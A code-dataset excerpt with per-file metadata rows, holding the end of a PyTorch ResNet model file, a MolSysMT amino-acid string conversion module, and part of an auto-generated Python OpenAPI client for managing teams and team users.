# def ResNet101(input_shape, num_classes, dense_classifier, pretrained, init_method='standard'):
# return ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes,
# init_method=init_method)
def ResNet101(num_classes=10, init_method='standard'):
return ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes, init_method=init_method)
# def ResNet152(input_shape, num_classes, dense_classifier, pretrained, init_method='standard'):
# return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes,
# init_method=init_method)
def ResNet152(num_classes=10, init_method='standard'):
return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes, init_method=init_method)
def test():
net = ResNet18()
y = net(torch.randn(1,3,32,32))
print(y.size())
# test()
| 41.850325 | 113 | 0.609599 | 2,501 | 19,293 | 4.501799 | 0.079968 | 0.065725 | 0.034106 | 0.013323 | 0.885869 | 0.871303 | 0.83924 | 0.807088 | 0.795453 | 0.76783 | 0 | 0.03809 | 0.265174 | 19,293 | 460 | 114 | 41.941304 | 0.756084 | 0.107345 | 0 | 0.73842 | 0 | 0 | 0.047796 | 0.008383 | 0 | 0 | 0 | 0 | 0 | 1 | 0.100817 | false | 0 | 0.019074 | 0.019074 | 0.20436 | 0.002725 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8df63d76734a5a80e93a5c0b958ef097b24173d2 | 10,880 | py | Python | molsysmt/forms/strings/api_string_aminoacids1.py | uibcdf/MolSysMT | 9866a6fb090df9fff36af113a45164da4b674c09 | [
"MIT"
] | 3 | 2020-06-02T03:55:52.000Z | 2022-03-21T04:43:52.000Z | molsysmt/forms/strings/api_string_aminoacids1.py | uibcdf/MolSysMT | 9866a6fb090df9fff36af113a45164da4b674c09 | [
"MIT"
] | 28 | 2020-06-24T00:55:53.000Z | 2021-07-16T22:09:19.000Z | molsysmt/forms/strings/api_string_aminoacids1.py | uibcdf/MolSysMT | 9866a6fb090df9fff36af113a45164da4b674c09 | [
"MIT"
] | 1 | 2021-06-17T18:55:25.000Z | 2021-06-17T18:55:25.000Z | from molsysmt._private_tools.exceptions import *
from molsysmt.forms.common_gets import *
import numpy as np
from molsysmt.molecular_system import molecular_system_components
form_name='string:aminoacids1'
is_form={
'string:aminoacids1' : form_name,
}
info=["",""]
has = molecular_system_components.copy()
for ii in ['elements']:
has[ii]=True
### Corresponde al formato IUPAC extended protein que aparece en Biopython
def to_string_aminoacids3(item, molecular_system=None, atom_indices='all', frame_indices='all'):
from Bio.SeqUtils import seq3
tmp_item=seq3(item)
if molecular_system is not None:
tmp_molecular_system=molecular_system.combine_with_items(tmp_item)
else:
tmp_molecular_system=None
return tmp_item, tmp_molecular_system
def to_biopython_Seq(item, molecular_system=None, atom_indices='all', frame_indices='all'):
from molsysmt.forms.classes.api_biopython_Seq import extract as extract_biopython_Seq
from Bio.Seq import Seq as bio_Seq
from Bio.Alphabet.IUPAC import ExtendedIUPACProtein
tmp_item = bio_Seq(item, ExtendedIUPACProtein())
tmp_item = extract_biopython_Seq(tmp_item, atom_indices=atom_indices, frame_indices=frame_indices)
if molecular_system is not None:
tmp_molecular_system = molecular_system.combine_with_items(tmp_item, atom_indices=atom_indices, frame_indices=frame_indices)
else:
tmp_molecular_system = None
return tmp_item, tmp_molecular_system
def to_biopython_SeqRecord(item, molecular_system=None, atom_indices='all', frame_indices='all', id=None, name=None, description=None):
from molsysmt.forms.classes.api_biopython_Seq import to_biopython_SeqRecord as Seq_to_SeqRecord
tmp_item, tmp_molecular_system = to_biopython_Seq(item, molecular_system=molecular_system, atom_indices=atom_indices, frame_indices=frame_indices)
tmp_item, tmp_molecular_system = Seq_to_SeqRecord(tmp_item, molecular_system=tmp_molecular_system)
return tmp_item, tmp_molecular_system
def to_fasta(item, molecular_system=None, atom_indices='all', frame_indices='all', output_filename=None):
from molsysmt.forms.classes.api_biopython_SeqRecord import to_fasta as SeqRecord_to_fasta
tmp_item, tmp_molecular_system = to_biopython_SeqRecord(item, molecular_system=molecular_system, atom_indices=atom_indices, frame_indices=frame_indices)
tmp_item, tmp_molecular_system = SeqRecord_to_fasta(tmp_item, molecular_system=tmp_molecular_system, output_filename=output_filename)
return tmp_item, tmp_molecular_system
def to_pir(item, molecular_system=None, atom_indices='all', frame_indices='all', output_filename=None, id=None, style=None):
from molsysmt.forms.classes.api_biopython_SeqRecord import to_file_pir as SeqRecord_to_file_pir
tmp_item, tmp_molecular_system = to_biopython_SeqRecord(item, molecular_system=molecular_system, id=id, atom_indices=atom_indices, frame_indices=frame_indices)
tmp_item, tmp_molecular_system = SeqRecor_to_pir(tmp_item, molecular_system=tmp_molecular_system, output_filename=output_filename, style=style)
return tmp_item, tmp_molecular_system
def to_string_aminoacids1(item, molecular_system=None, atom_indices='all', frame_indices='all', copy_if_all=True):
tmp_molecular_system = None
if (atom_indices is 'all') and (frame_indices is 'all'):
if copy_if_all:
tmp_item = extract_item(item)
if molecular_system is not None:
tmp_molecular_system = molecular_system.combine_with_items(tmp_item)
else:
tmp_item = item
if molecular_system is not None:
tmp_molecular_system = molecular_system
else:
tmp_item = extract_item(item, atom_indices=atom_indices, frame_indices=frame_indices)
if molecular_system is not None:
tmp_molecular_system = molecular_system.combine_with_items(tmp_item, atom_indices=atom_indices, frame_indices=frame_indices)
return tmp_item, tmp_molecular_system
def extract_item(item, atom_indices='all', frame_indices='all'):
if (atom_indices is 'all') and (frame_indices is 'all'):
raise NotImplementedError()
else:
raise NotImplementedError()
return tmp_item
def add(item, from_item, atom_indices='all', frame_indices='all'):
raise NotImplementedError()
def append_frames(item, step=None, time=None, coordinates=None, box=None):
raise NotImplementedError()
###### Get
## atom
def get_atom_id_from_atom(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_atom_name_from_atom(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_atom_type_from_atom(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_group_index_from_atom (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_component_index_from_atom (item, indices='all', frame_indices='all'):
from molsysmt.elements.component import get_component_index_from_atom as _get
return _get(item, indices=indices)
def get_chain_index_from_atom (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_molecule_index_from_atom (item, indices='all', frame_indices='all'):
from molsysmt.elements.molecule import get_molecule_index_from_atom as _get
return _get(item, indices=indices)
def get_entity_index_from_atom (item, indices='all', frame_indices='all'):
from molsysmt.elements.entity import get_entity_index_from_atom as _get
return _get(item, indices=indices)
def get_inner_bonded_atoms_from_atom (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_n_inner_bonds_from_atom (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_coordinates_from_atom(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_frame_from_atom(item, indices='all', frame_indices='all'):
raise NotImplementedError
## group
def get_group_id_from_group(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_group_name_from_group(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_group_type_from_group(item, indices='all', frame_indices='all'):
raise NotImplementedError
## component
def get_component_id_from_component (item, indices='all', frame_indices='all'):
from molsysmt.elements.component import get_component_id_from_component as get
return get(item, indices)
def get_component_name_from_component (item, indices='all', frame_indices='all'):
from molsysmt.elements.component import get_component_name_from_component as get
return get(item, indices)
def get_component_type_from_component (item, indices='all', frame_indices='all'):
from molsysmt.elements.component import get_component_type_from_component as get
return get(item, indices)
## molecule
def get_molecule_id_from_molecule (item, indices='all', frame_indices='all'):
from molsysmt.elements.molecule import get_molecule_id_from_molecule as get
return get(item, indices)
def get_molecule_name_from_molecule (item, indices='all', frame_indices='all'):
from molsysmt.elements.molecule import get_molecule_name_from_molecule as get
return get(item, indices)
def get_molecule_type_from_molecule (item, indices='all', frame_indices='all'):
from molsysmt.elements.molecule import get_molecule_type_from_molecule as get
return get(item, indices)
## chain
def get_chain_id_from_chain (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_chain_name_from_chain (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_chain_type_from_chain (item, indices='all', frame_indices='all'):
raise NotImplementedError
## entity
def get_entity_id_from_entity (item, indices='all', frame_indices='all'):
from molsysmt.elements.entity import get_entity_id_from_molecule as get
return get(item, indices)
def get_entity_name_from_entity (item, indices='all', frame_indices='all'):
from molsysmt.elements.entity import get_entity_name_from_molecule as get
return get(item, indices)
def get_entity_type_from_entity (item, indices='all', frame_indices='all'):
from molsysmt.elements.entity import get_entity_type_from_molecule as get
return get(item, indices)
## system
def get_n_atoms_from_system(item, indices='all', frame_indices='all'):
return None
def get_n_groups_from_system(item, indices='all', frame_indices='all'):
return len(item)
def get_n_components_from_system(item, indices='all', frame_indices='all'):
from molsysmt.elements.component import get_n_components_from_system as get
return get(item, indices)
def get_n_chains_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_n_molecules_from_system(item, indices='all', frame_indices='all'):
from molsysmt.elements.molecule import get_n_molecules_from_system as get
return get(item, indices)
def get_n_entities_from_system(item, indices='all', frame_indices='all'):
from molsysmt.elements.entity import get_n_entities_from_system as get
return get(item, indices)
def get_n_bonds_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_box_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_box_shape_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_box_lengths_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_box_angles_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_box_volume_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_time_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_step_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_n_frames_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_bonded_atoms_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
## bond
def get_bond_order_from_bond(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_bond_type_from_bond(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_atom_index_from_bond(item, indices='all', frame_indices='all'):
raise NotImplementedError
###### Set
def set_box_to_system(item, indices='all', frame_indices='all', value=None):
raise NotImplementedError
def set_coordinates_to_system(item, indices='all', frame_indices='all', value=None):
raise NotImplementedError
| 32.284866 | 163 | 0.77739 | 1,509 | 10,880 | 5.254473 | 0.072896 | 0.141254 | 0.10594 | 0.155379 | 0.845504 | 0.815235 | 0.813343 | 0.793795 | 0.757977 | 0.735023 | 0 | 0.000636 | 0.132537 | 10,880 | 336 | 164 | 32.380952 | 0.839479 | 0.012224 | 0 | 0.409836 | 0 | 0 | 0.036588 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.311475 | false | 0 | 0.142077 | 0.010929 | 0.584699 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
5c42c53ea2a1b676482e69f107b946fb3c913dba | 36,284 | py | Python | umschlag/api/team_api.py | umschlag/umschlag-python | d8973bef93455fcae434b0cb490b771c6f069d0b | [
"Apache-2.0"
] | null | null | null | umschlag/api/team_api.py | umschlag/umschlag-python | d8973bef93455fcae434b0cb490b771c6f069d0b | [
"Apache-2.0"
] | 1 | 2018-03-31T12:33:29.000Z | 2018-03-31T12:33:29.000Z | umschlag/api/team_api.py | umschlag/umschlag-python | d8973bef93455fcae434b0cb490b771c6f069d0b | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Umschlag OpenAPI
API definition for Umschlag # noqa: E501
The version of the OpenAPI document: 1.0.0-alpha1
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from umschlag.api_client import ApiClient
from umschlag.exceptions import (
ApiTypeError,
ApiValueError
)
class TeamApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def append_team_to_user(self, team_id, team_user, **kwargs): # noqa: E501
"""Assign a user to team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.append_team_to_user(team_id, team_user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:param TeamUserParams team_user: The team user data to assign (required)
:return: GeneralError
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.append_team_to_user_with_http_info(team_id, team_user, **kwargs) # noqa: E501
else:
(data) = self.append_team_to_user_with_http_info(team_id, team_user, **kwargs) # noqa: E501
return data
def append_team_to_user_with_http_info(self, team_id, team_user, **kwargs): # noqa: E501
"""Assign a user to team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.append_team_to_user_with_http_info(team_id, team_user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:param TeamUserParams team_user: The team user data to assign (required)
:return: GeneralError
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['team_id', 'team_user'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method append_team_to_user" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'team_id' is set
if ('team_id' not in local_var_params or
local_var_params['team_id'] is None):
raise ApiValueError("Missing the required parameter `team_id` when calling `append_team_to_user`") # noqa: E501
# verify the required parameter 'team_user' is set
if ('team_user' not in local_var_params or
local_var_params['team_user'] is None):
raise ApiValueError("Missing the required parameter `team_user` when calling `append_team_to_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'team_id' in local_var_params:
path_params['team_id'] = local_var_params['team_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'team_user' in local_var_params:
body_params = local_var_params['team_user']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/teams/{team_id}/users', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GeneralError', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_team(self, team, **kwargs): # noqa: E501
"""Create a new team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_team(team, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Team team: The team data to create (required)
:return: Team
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_team_with_http_info(team, **kwargs) # noqa: E501
else:
(data) = self.create_team_with_http_info(team, **kwargs) # noqa: E501
return data
def create_team_with_http_info(self, team, **kwargs): # noqa: E501
"""Create a new team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_team_with_http_info(team, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Team team: The team data to create (required)
:return: Team
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['team'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_team" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'team' is set
if ('team' not in local_var_params or
local_var_params['team'] is None):
raise ApiValueError("Missing the required parameter `team` when calling `create_team`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'team' in local_var_params:
body_params = local_var_params['team']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/teams', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Team', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_team(self, team_id, **kwargs): # noqa: E501
"""Delete a specific team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_team(team_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:return: GeneralError
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_team_with_http_info(team_id, **kwargs) # noqa: E501
else:
(data) = self.delete_team_with_http_info(team_id, **kwargs) # noqa: E501
return data
def delete_team_with_http_info(self, team_id, **kwargs): # noqa: E501
"""Delete a specific team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_team_with_http_info(team_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:return: GeneralError
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['team_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_team" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'team_id' is set
if ('team_id' not in local_var_params or
local_var_params['team_id'] is None):
raise ApiValueError("Missing the required parameter `team_id` when calling `delete_team`") # noqa: E501
collection_formats = {}
path_params = {}
if 'team_id' in local_var_params:
path_params['team_id'] = local_var_params['team_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/teams/{team_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GeneralError', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_team_from_user(self, team_id, team_user, **kwargs): # noqa: E501
"""Remove a user from team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_team_from_user(team_id, team_user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:param TeamUserParams team_user: The team user data to delete (required)
:return: GeneralError
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_team_from_user_with_http_info(team_id, team_user, **kwargs) # noqa: E501
else:
(data) = self.delete_team_from_user_with_http_info(team_id, team_user, **kwargs) # noqa: E501
return data
def delete_team_from_user_with_http_info(self, team_id, team_user, **kwargs): # noqa: E501
"""Remove a user from team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_team_from_user_with_http_info(team_id, team_user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:param TeamUserParams team_user: The team user data to delete (required)
:return: GeneralError
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['team_id', 'team_user'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_team_from_user" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'team_id' is set
if ('team_id' not in local_var_params or
local_var_params['team_id'] is None):
raise ApiValueError("Missing the required parameter `team_id` when calling `delete_team_from_user`") # noqa: E501
# verify the required parameter 'team_user' is set
if ('team_user' not in local_var_params or
local_var_params['team_user'] is None):
raise ApiValueError("Missing the required parameter `team_user` when calling `delete_team_from_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'team_id' in local_var_params:
path_params['team_id'] = local_var_params['team_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'team_user' in local_var_params:
body_params = local_var_params['team_user']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/teams/{team_id}/users', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GeneralError', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_team_users(self, team_id, **kwargs): # noqa: E501
"""Fetch all users assigned to team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_team_users(team_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:return: list[TeamUser]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_team_users_with_http_info(team_id, **kwargs) # noqa: E501
else:
(data) = self.list_team_users_with_http_info(team_id, **kwargs) # noqa: E501
return data
def list_team_users_with_http_info(self, team_id, **kwargs): # noqa: E501
"""Fetch all users assigned to team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_team_users_with_http_info(team_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:return: list[TeamUser]
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['team_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_team_users" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'team_id' is set
if ('team_id' not in local_var_params or
local_var_params['team_id'] is None):
raise ApiValueError("Missing the required parameter `team_id` when calling `list_team_users`") # noqa: E501
collection_formats = {}
path_params = {}
if 'team_id' in local_var_params:
path_params['team_id'] = local_var_params['team_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/teams/{team_id}/users', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TeamUser]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_teams(self, **kwargs): # noqa: E501
"""Fetch all available teams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_teams(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[Team]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_teams_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_teams_with_http_info(**kwargs) # noqa: E501
return data
def list_teams_with_http_info(self, **kwargs): # noqa: E501
"""Fetch all available teams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_teams_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[Team]
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_teams" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/teams', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Team]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def permit_team_user(self, team_id, team_user, **kwargs): # noqa: E501
"""Update user perms for team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.permit_team_user(team_id, team_user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:param TeamUserParams team_user: The team user data to update (required)
:return: GeneralError
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.permit_team_user_with_http_info(team_id, team_user, **kwargs) # noqa: E501
else:
(data) = self.permit_team_user_with_http_info(team_id, team_user, **kwargs) # noqa: E501
return data
def permit_team_user_with_http_info(self, team_id, team_user, **kwargs): # noqa: E501
"""Update user perms for team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.permit_team_user_with_http_info(team_id, team_user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:param TeamUserParams team_user: The team user data to update (required)
:return: GeneralError
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['team_id', 'team_user'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method permit_team_user" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'team_id' is set
if ('team_id' not in local_var_params or
local_var_params['team_id'] is None):
raise ApiValueError("Missing the required parameter `team_id` when calling `permit_team_user`") # noqa: E501
# verify the required parameter 'team_user' is set
if ('team_user' not in local_var_params or
local_var_params['team_user'] is None):
raise ApiValueError("Missing the required parameter `team_user` when calling `permit_team_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'team_id' in local_var_params:
path_params['team_id'] = local_var_params['team_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'team_user' in local_var_params:
body_params = local_var_params['team_user']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/teams/{team_id}/users', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GeneralError', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def show_team(self, team_id, **kwargs): # noqa: E501
"""Fetch a specific team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.show_team(team_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:return: Team
If the method is called asynchronously,
returns the request thread.
